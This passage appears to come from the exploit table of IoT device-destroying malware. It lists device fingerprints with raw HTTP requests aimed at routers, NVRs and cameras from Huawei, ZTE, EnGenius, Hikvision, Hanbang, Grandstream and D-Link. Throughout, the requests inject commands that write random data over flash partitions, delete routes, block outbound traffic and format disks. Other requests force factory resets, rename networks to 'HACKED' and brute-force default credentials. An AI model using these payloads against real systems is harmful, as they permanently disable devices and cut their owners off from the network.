 'POST /html/management/excutecmd.cgi?cmd=`iptables%20-A%20OUTPUT%20-j%20DROP`&RequestFile=/html/management/diagnose.asp HTTP/1.1\r\nHost: %%TARGETIP%%\r\nCookie: FirstMenu=Admin_3; SecondMenu=Admin_3_2; ThirdMenu=Admin_3_2_0; Language=en; SessionID_R3=%%CUSTOM1%%\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 0\r\n\r\n' ,
6322
 'GET / HTTP/1.0\r\n\r\n' ,
6323
 ] ,
6324
 [ 'hg532a' , 'util\.js.*LoginTimes.*Cookieflag' ,
6325
 'POST /login.cgi?Username=admin&Password=YWRtaW4=&Language=0&RequestFile=html/content.asp HTTP/1.1\r\nHost: %%TARGETIP%%\r\nCookie: FirstMenu=Admin_0; SecondMenu=Admin_0_0; ThirdMenu=Admin_0_0_0; Language=en\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 0\r\n\r\n' ,
6326
'POST /html/network/setcfg.cgi?y=InternetGatewayDevice.LANDevice.1.LANHostConfigManagement&x=InternetGatewayDevice.LANDevice.1.LANHostConfigManagement.IPInterface.1&RequestFile=html/network/dhcp.asp HTTP/1.1\r\nHost: %%TARGETIP%%\r\nCookie: LoginTimes=0:LoginOverTime=0; rememberme=0; Username=%%LOGIN%%; Password=%%PASSWORD%%; FirstMenu=Admin_1; SecondMenu=Admin_1_1; ThirdMenu=Admin_1_1_2; sessionID=%%CUSTOM1%%; Language=English\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nx.IPInterfaceIPAddress=10.%%RAND8%%&x.IPInterfaceSubnetMask=255.255.255.0&y.MinAddress=10.%COMP8%%&y.MaxAddress=10.%%COMP8%%&y.X_ATP_STB-MinAddress=0.0.0.0&y.X_ATP_STB-MaxAddress=0.0.0.0&y.X_ATP_STB-DHCPRelay=0&y.X_ATP_STB-DHCPOption60=&y.DNSServers=&y.DomainName=&y.UseAllocatedWAN=&y.AssociatedConnection=&y.PassthroughMACAddress=&y.DHCPLeaseTime=86400&y.DHCPServerEnable=1&y.X_ATP_DHCPRelayEnable=0&y.X_ATP_DHCPRelayLAN1=0&y.X_ATP_DHCPRelayLAN2=0&y.X_ATP_DHCPRelayLAN3=0&y.X_ATP_DHCPRelayLAN4=0&y.X_ATP_DHCPRelaySSID1=0&y.X_ATP_DHCPRelaySSID2=0&y.X_ATP_DHCPRelaySSID3=0&y.X_ATP_DHCPRelaySSID4=0' ,
6327
 'POST /html/network/setcfg.cgi?x=InternetGatewayDevice.LANDevice.1&y=InternetGatewayDevice.LANDevice.1.WLANConfiguration.1&k=InternetGatewayDevice.LANDevice.1.WLANConfiguration.1&RequestFile=html/network/wlan.asp HTTP/1.1\r\nHost: %%TARGETIP%%\r\nCookie: LoginTimes=0:LoginOverTime=0; rememberme=0; Username=%%LOGIN%%; Password=%%PASSWORD%%; FirstMenu=Admin_1; SecondMenu=Admin_1_1; ThirdMenu=Admin_1_1_0; sessionID=%%CUSTOM1%%; Language=English\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\ny.Standard=b%2Fg%2Fn&y.MaxBitRate=Auto&y.X_ATP_11NHtMcs=33&y.Enable=1&y.Channel=0&y.X_ATP_SSIDHide=0&y.X_ATP_WlanQosControl=0&y.X_ATP_WlanAPISOControl=0&y.X_ATP_Wlan11NBWControl=20&y.X_ATP_Wlan11NGIControl=short&y.SSID=HACKED&y.RegulatoryDomain=EG&y.X_ATP_AssociateDeviceNum=126&y.X_ATP_PowerValue=10&y.BeaconType=WPAand11i&y.X_ATP_WPSControl=0&y.X_ATP_WPSMode=ap-pbc&k.PreSharedKey.1.PreSharedKey=13041963&y.WPAWPA2EncryptionModes=TKIPandAESEncryption&x.X_ATP_WLANEnable=1' ,
6328
 'GET /html/management/excutecmd.cgi?cmd=%60cat+/dev/urandom+%3E/dev/mtdblock0%60&RequestFile=html/management/diagnose.asp HTTP/1.1\r\nHost: %%TARGETIP%%\r\nCookie: LoginTimes=0:LoginOverTime=0; rememberme=0; Username=%%LOGIN%%; Password=%%PASSWORD%%; FirstMenu=Admin_3; SecondMenu=Admin_3_2; ThirdMenu=Admin_3_2_0; sessionID=%%CUSTOM1%%; Language=English\r\n\r\n' ,
6329
 'GET /html/management/excutecmd.cgi?cmd=%60cat+/dev/urandom+%3E/dev/mtdblock3%60&RequestFile=html/management/diagnose.asp HTTP/1.1\r\nHost: %%TARGETIP%%\r\nCookie: LoginTimes=0:LoginOverTime=0; rememberme=0; Username=%%LOGIN%%; Password=%%PASSWORD%%; FirstMenu=Admin_3; SecondMenu=Admin_3_2; ThirdMenu=Admin_3_2_0; sessionID=%%CUSTOM1%%; Language=English\r\n\r\n' ,
6330
 'GET /html/management/excutecmd.cgi?cmd=%60cat+/dev/urandom+%3E/dev/mtdblock1%60&RequestFile=html/management/diagnose.asp HTTP/1.1\r\nHost: %%TARGETIP%%\r\nCookie: LoginTimes=0:LoginOverTime=0; rememberme=0; Username=%%LOGIN%%; Password=%%PASSWORD%%; FirstMenu=Admin_3; SecondMenu=Admin_3_2; ThirdMenu=Admin_3_2_0; sessionID=%%CUSTOM1%%; Language=English\r\n\r\n' ,
6331
 'GET /html/management/excutecmd.cgi?cmd=%60cat+/dev/urandom+%3E/dev/mtdblock2%60&RequestFile=html/management/diagnose.asp HTTP/1.1\r\nHost: %%TARGETIP%%\r\nCookie: LoginTimes=0:LoginOverTime=0; rememberme=0; Username=%%LOGIN%%; Password=%%PASSWORD%%; FirstMenu=Admin_3; SecondMenu=Admin_3_2; ThirdMenu=Admin_3_2_0; sessionID=%%CUSTOM1%%; Language=English\r\n\r\n' ,
6332
 'GET /html/management/excutecmd.cgi?cmd=%60cat+/dev/urandom+%3E/dev/mtdblock4%60&RequestFile=html/management/diagnose.asp HTTP/1.1\r\nHost: %%TARGETIP%%\r\nCookie: LoginTimes=0:LoginOverTime=0; rememberme=0; Username=%%LOGIN%%; Password=%%PASSWORD%%; FirstMenu=Admin_3; SecondMenu=Admin_3_2; ThirdMenu=Admin_3_2_0; sessionID=%%CUSTOM1%%; Language=English\r\n\r\n' ,
6333
 'GET /html/management/excutecmd.cgi?cmd=%60cat+/dev/urandom+%3E/dev/mtdblock5%60&RequestFile=html/management/diagnose.asp HTTP/1.1\r\nHost: %%TARGETIP%%\r\nCookie: LoginTimes=0:LoginOverTime=0; rememberme=0; Username=%%LOGIN%%; Password=%%PASSWORD%%; FirstMenu=Admin_3; SecondMenu=Admin_3_2; ThirdMenu=Admin_3_2_0; sessionID=%%CUSTOM1%%; Language=English\r\n\r\n' ,
6334
 'GET /html/management/excutecmd.cgi?cmd=%60iptables+-A+OUTPUT+-j+DROP%60&RequestFile=html/management/diagnose.asp HTTP/1.1\r\nHost: %%TARGETIP%%\r\nCookie: LoginTimes=0:LoginOverTime=0; rememberme=0; Username=%%LOGIN%%; Password=%%PASSWORD%%; FirstMenu=Admin_3; SecondMenu=Admin_3_2; ThirdMenu=Admin_3_2_0; sessionID=%%CUSTOM1%%; Language=English\r\n\r\n' ,
6335
 'GET / HTTP/1.0\r\n\r\n' ,
6336
 ] ,
6337
 [ 'zxdsl831' , 'microhttpd.*realm=DSL Router;' ,
6338
 'GET /connoppp.cgi HTTP/1.1\r\nHost: %%TARGETIP%%\r\n\r\n' ,
6339
 'GET /connoppp.cgi HTTP/1.1\r\nHost: %%TARGETIP%%\r\n\r\n' ,
6340
 'GET /ntwkprtcl.cgi?enblAutoScan=0&portId=0&atmVpi=0&atmVci=65533&enblQos=0&quickSetup=1&serviceId=1 HTTP/1.1\r\nHost: %%TARGETIP%%\r\n\r\n' ,
6341
 'GET /ntwkprtcl.cgi?enblAutoScan=0&portId=0&atmVpi=0&atmVci=65533&enblQos=0&quickSetup=1&serviceId=1 HTTP/1.1\r\nHost: %%TARGETIP%%\r\n\r\n' ,
6342
 'GET /wancfg.cgi?ntwkPrtcl=2&encapMode=1&enVlanMux=0&vlanMuxId=-1&serviceName=mer_0_65533 HTTP/1.1\r\nHost: %%TARGETIP%%\r\n\r\n' ,
6343
 'GET /wancfg.cgi?ntwkPrtcl=2&encapMode=1&enVlanMux=0&vlanMuxId=-1&serviceName=mer_0_65533 HTTP/1.1\r\nHost: %%TARGETIP%%\r\n\r\n' ,
6344
 'GET /lancfg.cgi?ntwkPrtcl=2&enblDhcpClnt=0&enblAuto=0&wanIpAddress=10.%%RAND8%%&wanSubnetMask=255.255.255.0&defaultGateway=10.%%COMP8%%&wanIfName=&dnsPrimary=1.1.2.2&dnsSecondary=1.1.3.3&dnsDynamic=0&serviceName=mer_0_65533&enblNat=0&enblUPnP=0&enblFirewall=1&enblQos=0 HTTP/1.1\r\nHost: %%TARGETIP%%\r\n\r\n' ,
6345
 'GET /lancfg.cgi?ntwkPrtcl=2&enblDhcpClnt=0&enblAuto=0&wanIpAddress=10.%%RAND8%%&wanSubnetMask=255.255.255.0&defaultGateway=10.%%COMP8%%&wanIfName=&dnsPrimary=1.1.2.2&dnsSecondary=1.1.3.3&dnsDynamic=0&serviceName=mer_0_65533&enblNat=0&enblUPnP=0&enblFirewall=1&enblQos=0 HTTP/1.1\r\nHost: %%TARGETIP%%\r\n\r\n' ,
6346
 'GET /ntwksum2.cgi?ethIpAddress=1.2.3.4&ethSubnetMask=255.255.255.248&enblLan2=1&lan2IpAddress=1.2.3.5&lan2SubnetMask=255.255.255.252&enblDhcpSrv=0 HTTP/1.1\r\nHost: %%TARGETIP%%\r\n\r\n' ,
6347
 'GET /ntwksum2.cgi?ethIpAddress=1.2.3.4&ethSubnetMask=255.255.255.248&enblLan2=1&lan2IpAddress=1.2.3.5&lan2SubnetMask=255.255.255.252&enblDhcpSrv=0 HTTP/1.1\r\nHost: %%TARGETIP%%\r\n\r\n' ,
6348
 'GET /rebootinfo.cgi HTTP/1.1\r\nHost: %%TARGETIP%%\r\n\r\n' ,
6349
 'GET /rebootinfo.cgi HTTP/1.1\r\nHost: %%TARGETIP%%\r\n\r\n' ,
6350
 'GET / HTTP/1.0\r\n\r\n' ,
6351
 ] ,
6352
 [ 'engenius' , 'lighttpd.*web\/jquery\.js.*getlanguagejs\.htm' ,
6353
 'POST /web/cgi-bin/usbinteract.cgi HTTP/1.1\r\nHost: %%TARGETIP%%:%%TARGETPORT%%\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\naction=7&path=\"|cat /dev/urandom >/dev/mtdblock6||\"' ,
6354
 'POST /web/cgi-bin/usbinteract.cgi HTTP/1.1\r\nHost: %%TARGETIP%%:%%TARGETPORT%%\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\naction=7&path=\"|cat /dev/urandom >/dev/mtdblock4||\"' ,
6355
 'POST /web/cgi-bin/usbinteract.cgi HTTP/1.1\r\nHost: %%TARGETIP%%:%%TARGETPORT%%\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\naction=7&path=\"|cat /dev/urandom >/dev/root||\"' ,
6356
 'POST /web/cgi-bin/usbinteract.cgi HTTP/1.1\r\nHost: %%TARGETIP%%:%%TARGETPORT%%\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\naction=7&path=\"|route del default||\"' ,
6357
 'GET / HTTP/1.0\r\n\r\n' ,
6358
 ] ,
6359
 [ 'crossweb' , 'Cross Web Server' ,
6360
 'GET /language/Swedish${IFS}&&mkdosfs${IFS}${HOME}dev${HOME}mtd0${IFS}9999${IFS}&>r&&tar${IFS}/string.js HTTP/1.0\r\n\r\n' ,
6361
 'GET /language/Swedish${IFS}&&mkdosfs${IFS}${HOME}dev${HOME}mtd1${IFS}9999${IFS}&>r&&tar${IFS}/string.js HTTP/1.0\r\n\r\n' ,
6362
 'GET /language/Swedish${IFS}&&mkdosfs${IFS}${HOME}dev${HOME}mtd2${IFS}9999${IFS}&>r&&tar${IFS}/string.js HTTP/1.0\r\n\r\n' ,
6363
 'GET /language/Swedish${IFS}&&mkdosfs${IFS}${HOME}dev${HOME}root${IFS}9999${IFS}&>r&&tar${IFS}/string.js HTTP/1.0\r\n\r\n' ,
6364
 'GET /language/Swedish${IFS}&&route${IFS}del${IFS}default&&tar${IFS}/string.js HTTP/1.0\r\n\r\n' ,
6365
 'GET /language/Swedish${IFS}&&reboot&&tar${IFS}/string.js HTTP/1.0\r\n\r\n' ,
6366
 'GET / HTTP/1.0\r\n\r\n' ,
6367
 ] ,
6368
[ 'hanbang' , 'Server: NVR Webserver' ,
6369
'PUT /ISAPI/Security/users/1 HTTP/1.1\r\nHost: %%TARGETIP%%\r\nX-Requested-With: XMLHttpRequest\r\nAuthorization: Basic YWRtaW46ODg4ODg4\r\nCookie: updateTips=true; streamType=0; BufferLever=1; userInfo%%TARGETPORT%%=YWRtaW46ODg4ODg4; DevID=5; language=en; curpage=paramconfig.asp%254\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\n<?xml version="1.0" encoding="UTF-8"?>\r\n<User><id>1</id><userName>admin</userName><password>admin</password><bondIpList><bondIp><id>1</id><ipAddress>0.0.0.0</ipAddress><ipv6Address>::</ipv6Address></bondIp></bondIpList><macAddress/><userLevel>administrator</userLevel><attribute><inherent>true</inherent></attribute></User>' ,
6370
'GET /ISAPI/Security/userCheck HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic YWRtaW46ODg4ODg4\r\nCookie: language=en; updateTips=true\r\n\r\n' ,
6371
'GET /ISAPI/Security/userCheck HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic YWRtaW46YWRtaW4=\r\nCookie: language=en; updateTips=true\r\n\r\n' ,
6372
'GET /ISAPI/Security/userCheck HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic YWRtaW46MTIzNDU2\r\nCookie: language=en; updateTips=true\r\n\r\n' ,
6373
'GET /ISAPI/Security/userCheck HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic YWRtaW46MDAwMDAw\r\nCookie: language=en; updateTips=true\r\n\r\n' ,
6374
'GET /ISAPI/Security/userCheck HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic YWRtaW46MTIzNDU2Nzg=\r\nCookie: language=en; updateTips=true\r\n\r\n' ,
6375
'PUT /ISAPI/System/Video/inputs/channels/1 HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic %%CUSTOM1%%\r\nX-Requested-With: XMLHttpRequest\r\nCookie: language=en; updateTips=true; userInfo%%TARGETPORT%%=%%CUSTOM1%%; DevID=5; curpage=paramconfig.asp%254\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\n<?xml version="1.0" encoding="UTF-8"?>\r\n<ChannleName version="1.0" xmlns="http://www.isapi.org/ver20/XMLSchema"><name>HACKED</name></ChannleName>' ,
6376
 'PUT /ISAPI/System/Video/inputs/channels/2 HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic %%CUSTOM1%%\r\nX-Requested-With: XMLHttpRequest\r\nCookie: language=en; updateTips=true; userInfo%%TARGETPORT%%=%%CUSTOM1%%; DevID=5; curpage=paramconfig.asp%254\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\n<?xml version="1.0" encoding="UTF-8"?>\r\n<ChannleName version="1.0" xmlns="http://www.isapi.org/ver20/XMLSchema"><name>HACKED</name></ChannleName>' ,
6377
 'PUT /ISAPI/System/Video/inputs/channels/3 HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic %%CUSTOM1%%\r\nX-Requested-With: XMLHttpRequest\r\nCookie: language=en; updateTips=true; userInfo%%TARGETPORT%%=%%CUSTOM1%%; DevID=5; curpage=paramconfig.asp%254\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\n<?xml version="1.0" encoding="UTF-8"?>\r\n<ChannleName version="1.0" xmlns="http://www.isapi.org/ver20/XMLSchema"><name>HACKED</name></ChannleName>' ,
6378
 'PUT /ISAPI/System/Video/inputs/channels/4 HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic %%CUSTOM1%%\r\nX-Requested-With: XMLHttpRequest\r\nCookie: language=en; updateTips=true; userInfo%%TARGETPORT%%=%%CUSTOM1%%; DevID=5; curpage=paramconfig.asp%254\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\n<?xml version="1.0" encoding="UTF-8"?>\r\n<ChannleName version="1.0" xmlns="http://www.isapi.org/ver20/XMLSchema"><name>HACKED</name></ChannleName>' ,
6379
'PUT /ISAPI/ContentMgmt/Storage/hdd/SATA1/format HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic %%CUSTOM1%%\r\nX-Requested-With: XMLHttpRequest\r\nCookie: language=en; updateTips=true; userInfo%%TARGETPORT%%=%%CUSTOM1%%; DevID=5; curpage=paramconfig.asp%254\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 0\r\n\r\n' ,
6380
 'PUT /ISAPI/ContentMgmt/Storage/hdd/1 HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic %%CUSTOM1%%\r\nX-Requested-With: XMLHttpRequest\r\nCookie: language=en; updateTips=true; userInfo%%TARGETPORT%%=%%CUSTOM1%%; DevID=5; curpage=paramconfig.asp%254\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\n<?xml version="1.0" encoding="UTF-8"?><hdd><id>1</id><hddName>SATA</hddName><hddType>SATA</hddType><status>ok</status><capacity>953869</capacity><freeSpace>944128</freeSpace><property>RO</property></hdd>' ,
6381
'PUT /ISAPI/System/Network/interfaces/1?auth=%%CUSTOM1%% HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic %%CUSTOM1%%\r\nX-Requested-With: XMLHttpRequest\r\nCookie: language=en; updateTips=true; userInfo%%TARGETPORT%%=%%CUSTOM1%%; DevID=5; curpage=paramconfig.asp%254\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\n<?xml version="1.0" encoding="UTF-8"?>\n<NetworkInterface><id>1</id><IPAddress><ipVersion>dual</ipVersion><addressingType>static</addressingType><ipAddress>10.%%RAND8%%</ipAddress><subnetMask>255.255.255.0</subnetMask><DefaultGateway><ipAddress>10.%%COMP8%%</ipAddress></DefaultGateway><PrimaryDNS><ipAddress>1.2.3.4</ipAddress></PrimaryDNS><SecondaryDNS><ipAddress>1.2.3.5</ipAddress></SecondaryDNS></IPAddress><Link><MACAddress>8c:e7:48:35:ad:e4</MACAddress><autoNegotiation>true</autoNegotiation><speed>0</speed><duplex>full</duplex><MTU>1500</MTU></Link></NetworkInterface>' ,
6382
'PUT /ISAPI/System/Network/interfaces/1?auth=%%CUSTOM1%% HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic %%CUSTOM1%%\r\nX-Requested-With: XMLHttpRequest\r\nCookie: language=en; updateTips=true; userInfo%%TARGETPORT%%=%%CUSTOM1%%; DevID=5; curpage=paramconfig.asp%254\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\n<?xml version="1.0" encoding="UTF-8"?>\r\n<UPnP version="1.0" xmlns="http://www.isapi.org/ver20/XMLSchema"><enabled>false</enabled><status>scansucc</status><LANAddress>10.%%RAND8%%</LANAddress><WANAddress>10.%%COMP8%%</WANAddress></UPnP>' ,
6383
'PUT /ISAPI/System/factoryReset/mode=full HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic %%CUSTOM1%%\r\nX-Requested-With: XMLHttpRequest\r\nCookie: language=en; updateTips=true; userInfo%%TARGETPORT%%=%%CUSTOM1%%; DevID=5; curpage=paramconfig.asp%254\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 0\r\n\r\n' ,
6384
'PUT /ISAPI/System/reboot HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic %%CUSTOM1%%\r\nX-Requested-With: XMLHttpRequest\r\nCookie: language=en; updateTips=true; userInfo%%TARGETPORT%%=%%CUSTOM1%%; DevID=5; curpage=paramconfig.asp%254\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 0\r\n\r\n' ,
6385
 'GET / HTTP/1.0\r\n\r\n' ,
6386
 ] ,
6387
[ 'grandstream' , 'Server: GS-Webs' ,
6388
 'GET /Pages/system.html HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic YWRtaW46YWRtaW4=\r\n\r\n' ,
6389
 'GET /Pages/system.html HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic YWRtaW46MTIzNDU=\r\n\r\n' ,
6390
 'GET /Pages/system.html HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic YWRtaW46MTIzNA==\r\n\r\n' ,
6391
 'GET /Pages/system.html HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic YWRtaW46MTIzNDU2\r\n\r\n' ,
6392
 'GET /Pages/system.html HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic YWRtaW46ODg4ODg4\r\n\r\n' ,
6393
 'GET /goform/network?cmd=set&enabledhcp=0&ipaddress=10.%%RAND8%%&subnetmask=255.255.255.0&defaultgateway=10.%%COMP8%%&autodns=0&dnsserver.primary=1.2.3.4&dnsserver.standby=1.2.3.5&httpport=80 HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic %%CUSTOM1%%\r\n\r\n' ,
6394
 'GET /goform/date_time?cmd=set&updatemode=1&ntpserverenable=1&ntpserver=%2560cat%2520%252Fdev%252Furandom%2520%253E%252Fdev%252Froot%2560&ntpupdateinterval=60&timezone=25&deftimezone=&enable_dst=0&dst_str=GMT-03%253A30MDT-04%253A30%252CM1.1.0%252F00%253A00%253A00%252CM2.1.0%252F00%253A00%253A00 HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic %%CUSTOM1%%\r\n\r\n' ,
6395
 'POST /goform/maintenance?cmd=set&restart=yes HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic %%CUSTOM1%%\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 0\r\n\r\n' ,
6396
 'GET / HTTP/1.0\r\n\r\n' ,
6397
 ] ,
6398
[ 'dir300600' , '(DIR-600 Ver 2\.1[1234]|DIR-300 Ver 2\.1[23])' ,
6399
 'POST /command.php HTTP/1.1\r\nHost: %%TARGETIP%%\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\nContent-Length: %%BODYLENGTH%%\r\n\r\ncmd=route del default;iproute del default;ip route del default;cat /dev/urandom >/dev/mtdblock/0;cat /dev/urandom >/dev/mtdblock/1;cat /dev/urandom >/dev/mtdblock/2;cat /dev/urandom >/dev/mtdblock/3;cat /dev/urandom >/dev/mtdblock/4;cat /dev/urandom >/dev/mtdblock/5;cat /dev/urandom >/dev/mtdblock/6;cat /dev/urandom >/dev/mtdblock/7;cat /dev/urandom >/dev/root;cat /dev/urandom >/dev/mem;' ,
6400
 'GET / HTTP/1.0\r\n\r\n' ,
6401
 ] ,
6402
[ 'dir850' , 'Server: Linux, HTTP.*DIR-850L Ver' ,
6403
 'POST /hedwig.cgi HTTP/1.1\r\nHost: %%TARGETIP%%\r\nContent-type: text/xml\r\nCookie: uid=aDxpxsreSa\r\nContent-Length: %%BODYLENGTH%%\r\n\r\n<?xml version=\'1.0\' encoding=\'UTF-8\'?><postxml><module><service>../../../htdocs/webinc/getcfg/DEVICE.ACCOUNT.xml</service></module></postxml>' ,
6404
 'GET /authentication.cgi HTTP/1.0\r\n\r\n' ,
6405
 ] ,
6406
[ 'hikweb' , 'Server: (DNVRS-Webs|DVS-Webs|App-webs|DVRDVS-Webs|Hikvision-Webs)' ,
6407
 'GET /PSIA/Custom/SelfExt/userCheck HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic YWRtaW46MTIzNDU=\r\nCookie: language=en; updateTips=true\r\n\r\n' ,
6408
'GET /PSIA/Custom/SelfExt/userCheck HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic YWRtaW46YWRtaW4=\r\nCookie: language=en; updateTips=true\r\n\r\n' ,
6409
'GET /PSIA/Custom/SelfExt/userCheck HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic YWRtaW46MTIzNA==\r\nCookie: language=en; updateTips=true\r\n\r\n' ,
6410
'GET /PSIA/Custom/SelfExt/userCheck HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic YWRtaW46ODg4ODg4\r\nCookie: language=en; updateTips=true\r\n\r\n' ,
6411
'GET /PSIA/Custom/SelfExt/userCheck HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic YWRtaW46NTQzMjE=\r\nCookie: language=en; updateTips=true\r\n\r\n' ,
6412
'GET /PSIA/Custom/SelfExt/userCheck HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic YWRtaW46MTIzNDU2\r\nCookie: language=en; updateTips=true\r\n\r\n' ,
6413
'GET /PSIA/Custom/SelfExt/userCheck HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic YWRtaW46MTExMTEx\r\nCookie: language=en; updateTips=true\r\n\r\n' ,
6414
'GET /PSIA/Custom/SelfExt/userCheck HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic YWRtaW46NjU0MzIx\r\nCookie: language=en; updateTips=true\r\n\r\n' ,
6415
'GET /PSIA/Custom/SelfExt/userCheck HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic YWRtaW46MTIzNDU2Nzg5YWJj\r\nCookie: language=en; updateTips=true\r\n\r\n' ,
6416
'PUT /System/factoryDefault?auth=YWRtaW46MTEK&mode=full HTTP/1.1\r\nHost: %%TARGETIP%%\r\n\r\n' ,
6417
'PUT /System/reboot?auth=YWRtaW46MTEK HTTP/1.1\r\nHost: %%TARGETIP%%\r\n\r\n' ,
6418
'PUT /ISAPI/System/Network/telnetd?auth=%%CUSTOM1%% HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic %%CUSTOM1%%\r\nX-Requested-With: XMLHttpRequest\r\nCookie: language=en; updateTips=true; userInfo%%TARGETPORT%%=%%CUSTOM1%%\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\n<?xml version="1.0" encoding="UTF-8"?>\n<Telnetd><enabled>false</enabled></Telnetd>' ,
6419
'PUT /ISAPI/System/Network/interfaces/1?auth=%%CUSTOM1%% HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic %%CUSTOM1%%\r\nX-Requested-With: XMLHttpRequest\r\nCookie: language=en; updateTips=true; userInfo%%TARGETPORT%%=%%CUSTOM1%%\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\n<?xml version="1.0" encoding="UTF-8"?>\n<NetworkInterface><id>1</id><IPAddress><ipVersion>dual</ipVersion><addressingType>static</addressingType><ipAddress>10.%%RAND8%%</ipAddress><subnetMask>255.255.255.0</subnetMask><DefaultGateway><ipAddress>10.%%COMP8%%</ipAddress></DefaultGateway><PrimaryDNS><ipAddress>1.2.3.4</ipAddress></PrimaryDNS><SecondaryDNS><ipAddress>1.2.3.5</ipAddress></SecondaryDNS></IPAddress><Link><MACAddress>8c:e7:48:35:ad:e4</MACAddress><autoNegotiation>true</autoNegotiation><speed>0</speed><duplex>full</duplex><MTU>1500</MTU></Link></NetworkInterface>' ,
6420
 'PUT /PSIA/System/Network/interfaces/1?auth=%%CUSTOM1%% HTTP/1.1\r\nHost: %%TARGETIP%%\r\nAuthorization: Basic %%CUSTOM1%%\r\nX-Requested-With: XMLHttpRequest\r\nCookie: language=en; updateTips=true; userInfo%%TARGETPORT%%=%%CUSTOM1%%\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\n<?xml version="1.0" encoding="UTF-8"?>\n<NetworkInterface><id>1</id><IPAddress><ipVersion>dual</ipVersion><addressingType>static</addressingType><ipAddress>10.%%RAND8%%</ipAddress><subnetMask>255.255.255.0</subnetMask><DefaultGateway><ipAddress>10.%%COMP8%%</ipAddress></DefaultGateway><PrimaryDNS><ipAddress>1.2.3.4</ipAddress></PrimaryDNS><SecondaryDNS><ipAddress>1.2.3.5</ipAddress></SecondaryDNS></IPAddress><Link><MACAddress>8c:e7:48:35:ad:e4</MACAddress><autoNegotiation>true</autoNegotiation><speed>0</speed><duplex>full</duplex><MTU>1500</MTU></Link></NetworkInterface>' ,
6421
